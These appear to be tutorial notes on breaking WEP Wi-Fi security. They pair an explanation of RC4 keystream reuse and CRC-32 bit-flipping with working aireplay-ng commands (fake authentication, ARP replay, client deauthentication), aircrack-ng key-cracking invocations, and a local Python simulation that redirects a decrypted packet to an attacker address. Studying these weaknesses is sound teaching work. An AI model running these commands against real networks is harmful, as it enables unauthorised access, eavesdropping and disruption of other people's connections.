WEP
WEP (Wired Equivalent Privacy)¶
- Key length is 40 or 104 bits (sold as "64-bit" and "128-bit" WEP once the 24-bit IV is counted). The same shared key is configured on every device on the network
- Uses RC4 for encryption and for shared-key authentication
- Uses CRC-32 as the integrity check value (ICV)
- Each packet carries a 24-bit initialization vector (IV), sent in the clear
- The per-packet RC4 key is IV || SharedKey
Key Reuse Attack¶
- RC4 is a stream cipher; if the same keystream (same IV and key) is used twice, XORing the two ciphertexts yields the XOR of the two plaintexts
- The shared key is secret and fixed; only the IV rotates
- The IV is only 24 bits, so there are just 2^24 (about 16.7 million) possible keystreams per key
- Even with random IVs, the birthday bound gives a 50% chance of a repeated IV after roughly 5,000 packets; on a busy network that is under a minute. Many drivers use a sequential IV that restarts at zero, which repeats sooner still
Encryption¶
Encryption:
Shared_Key = K
Message = m
Cipher = (m || CRC-32(m)) xor RC4(IV || K)
The IV is prepended to the ciphertext in the clear so the receiver can regenerate the same keystream.
Authentication (shared-key mode):
1. AP sends 128 bytes (1024 bits) of random challenge text in the clear
2. Client encrypts the challenge under WEP and sends it back; the AP decrypts it and compares
An eavesdropper who sees both frames XORs them and recovers 128 bytes of keystream for that IV, enough to forge short packets without knowing the key.
Modification:
- CRC-32 is linear, so it does not detect deliberate changes: an attacker can flip chosen bits of the ciphertext and correct the ICV so the frame still decrypts and verifies
- This lets an attacker alter plaintext bits in any captured frame (and, with recovered keystream, inject whole messages) without knowing the key
- No IV repeat is needed; the ICV is not keyed, so the trick works on every single frame
(m || CRC-32(m)) xor RC4(IV || K) xor (e || d) = (m xor e || CRC-32(m) xor d) xor RC4(IV || K)
Because CRC-32 is affine, CRC-32(m xor e) = CRC-32(m) xor CRC-32(e) xor CRC-32(0...0) for equal lengths, so choosing d = CRC-32(e) xor CRC-32(0...0) makes the modified ICV valid for any m.
Attacks¶
Fake Authentication Attack¶
If the source MAC address of an injected frame is not associated with the access point, the AP discards the frame.
So the MAC address used for injection must be associated with the AP.
This is done either by performing a fake authentication with that MAC or by spoofing the MAC of a client that is already associated.
Example:
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
- -1: selects this attack type (fake authentication)
- 0: the reassociation timing in seconds (0 = authenticate once)
- -e: ESSID (wireless network name)
- -a: the access point's MAC address (BSSID)
- -h: the source MAC address to authenticate with (your card's MAC); the monitor-mode interface is the final positional argument
Example with a longer delay between authentications (helps with picky APs):
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
- 6000: re-authenticate every 6000 seconds
- -o 1: send only one packet per burst
- -q 10: send a keep-alive every 10 seconds
ARP Replay Attack¶
Capturing an ARP request and replaying it makes the AP re-broadcast it, encrypted with a fresh IV each time. Replaying the same request thousands of times per second produces the IVs needed for cracking in minutes. -b is the AP's BSSID and -h is the source MAC, which must be associated (see the fake authentication attack).
aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>
aireplay-ng -3 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0
Deauthentication Client¶
Deauthenticating a client forces it to reconnect. The reconnection generates fresh traffic under new IVs (typically an ARP request that can be captured for the replay attack) and also reveals a hidden ESSID. -0 1 sends a single deauthentication burst, -a is the AP's BSSID and -c the target client.
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>
Cracking the IVs¶
- 250,000 IVs are recommended for cracking 64-bit keys
- 1,500,000 IVs are recommended for cracking 128-bit keys
- These are the figures for the older statistical (KoreK/FMS) attacks; the PTW attack in current aircrack-ng needs far fewer
Cracking 64-bit or 128-bit keys (WEP has no 32-bit keys; the invocation is the same, and -n 64 or -n 128 forces a key length if needed):
aircrack-ng <capture>
Cracking¶
Active attacks (ARP replay, fake authentication) let an attacker generate enough traffic to crack a 104-bit key in minutes rather than waiting for organic traffic.
To crack WEP for a given ESSID and write the key to a file:
aircrack-ng -a 1 -e <essid> -l <output file> <.cap or .ivs file(s)>
To crack a given ESSID (WEP) and also display the key as ASCII:
aircrack-ng -e <essid> -s <.cap or .ivs file(s)>
To crack a given ESSID (WEP) and create an EWSA project file:
aircrack-ng -e <essid> -E <EWSA file> <.cap or .ivs file(s)>
IP Redirection¶
If the attacker can trick the access point into decrypting a packet and forwarding it to a host the attacker controls (by rewriting the destination IP address to their own), the AP hands over the plaintext; no key recovery is needed.
Part 1: knowing (or guessing) the source and destination IP addresses, the attacker XORs the ciphertext at the destination-address offset with old_dst xor new_dst. This changes the plaintext, so the WEP ICV must be corrected with the CRC-32 linearity trick from the Modification section.
Part 2: the IPv4 header checksum also covers the address bytes. It is a ones'-complement sum of 16-bit words, so the attacker compensates by changing the source IP address in the same way, choosing it so that the sum of the four address words is unchanged (alternatively, pick a destination that preserves the sum). The AP then accepts the frame, decrypts it, and routes the plaintext to the attacker's host.
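The following is an added worked example, not code from the original notes: it simulates WEP with a toy RC4, implements the bit-flipping modification attack from the Modification section (the d = CRC-32(e) xor CRC-32(0...0) correction), and then carries out the IP redirection above, rewriting the destination and compensating through the source address so the IPv4 header checksum stays valid. The 40-bit key, IV, addresses and packet contents are constructed for illustration; the LLC/SNAP header is included so the IP header sits at its real offset inside an 802.11 data payload.

```python
"""WEP bit-flipping and IP redirection, simulated end to end (constructed data)."""
import struct
import zlib

LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")  # LLC/SNAP header before IPv4 in 802.11 data


def rc4(key: bytes, n: int) -> bytes:
    """Toy RC4 keystream (KSA + PRGA); WEP seeds it with IV || K."""
    S = list(range(256)); j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray(); i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(m: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, transmitted little-endian."""
    return struct.pack("<I", zlib.crc32(m) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, m: bytes) -> bytes:
    """Cipher = (m || CRC-32(m)) xor RC4(IV || K); the 3-byte IV travels in the clear."""
    body = m + icv(m)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: plaintext if the ICV verifies, else None (frame dropped)."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    m, tag = plain[:-4], plain[-4:]
    return m if icv(m) == tag else None


def icv_delta(e: bytes) -> bytes:
    """d with CRC(m xor e) == CRC(m) xor d for every m of the same length, because
    CRC-32 is affine: CRC(a xor b) = CRC(a) xor CRC(b) xor CRC(0^n)."""
    return xor(icv(e), icv(bytes(len(e))))


def flip_bits(frame: bytes, e: bytes) -> bytes:
    """Modification attack: xor (e || d) into the ciphertext; no key, no plaintext needed."""
    return frame[:3] + xor(frame[3:], e + icv_delta(e))


def ip_bytes(a: str) -> bytes:
    return bytes(int(x) for x in a.split("."))


def ip_checksum(header: bytes) -> int:
    """RFC 1071 ones'-complement sum; over a header whose checksum field is valid it is 0."""
    s = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return ~s & 0xFFFF


def build_ipv4(src: str, dst: str, payload: bytes) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
                      64, 17, 0, ip_bytes(src), ip_bytes(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def redirect_mask(plain_len: int, src: str, dst: str, new_dst: str):
    """Part 1: e rewrites dst -> new_dst.  Part 2: the IPv4 checksum is a ones'-complement
    sum of 16-bit words, so also rewrite src such that the four address words keep the
    same sum (mod 0xFFFF).  The attacker needs src/dst only, not the key or the payload."""
    words = lambda b: struct.unpack("!HH", b)
    nd = ip_bytes(new_dst)
    keep = (sum(words(ip_bytes(src))) + sum(words(ip_bytes(dst))) - sum(words(nd))) % 0xFFFF
    hi = words(ip_bytes(src))[0]
    new_src = struct.pack("!HH", hi, (keep - hi) % 0xFFFF)
    e = bytearray(plain_len); off = len(LLC_SNAP_IP)
    e[off + 12:off + 16] = xor(ip_bytes(src), new_src)   # source address field
    e[off + 16:off + 20] = xor(ip_bytes(dst), nd)        # destination address field
    return bytes(e), new_src


def ip_redirect_demo():
    key, iv = b"\x01\x02\x03\x04\x05", b"\x00\x00\x01"     # constructed 40-bit key and IV
    src, dst, attacker = "10.0.0.5", "10.0.0.9", "203.0.113.7"
    m = LLC_SNAP_IP + build_ipv4(src, dst, b"hello")
    frame = wep_encrypt(key, iv, m)                         # what the attacker sniffs
    e, _ = redirect_mask(len(m), src, dst, attacker)        # attacker: no key, no plaintext
    out = wep_decrypt(key, flip_bits(frame, e))             # AP decrypts and forwards
    ip = out[len(LLC_SNAP_IP):] if out else b""
    dotted = lambda b: ".".join(str(x) for x in b)
    return {"icv_ok": out is not None,
            "ip_checksum_ok": bool(ip) and ip_checksum(ip[:20]) == 0,
            "src": dotted(ip[12:16]), "dst": dotted(ip[16:20]), "payload": ip[20:]}


if __name__ == "__main__":
    print(ip_redirect_demo())
```

The demo returns the decrypted packet as the AP would see it: ICV valid, IP checksum valid, destination now the attacker's 203.0.113.7 and source rewritten to 10.0.206.5 so the 16-bit address words still sum to the original value. Flipping the same bits without the `icv_delta` correction makes `wep_decrypt` return None, which is the only protection the CRC-32 ICV offers.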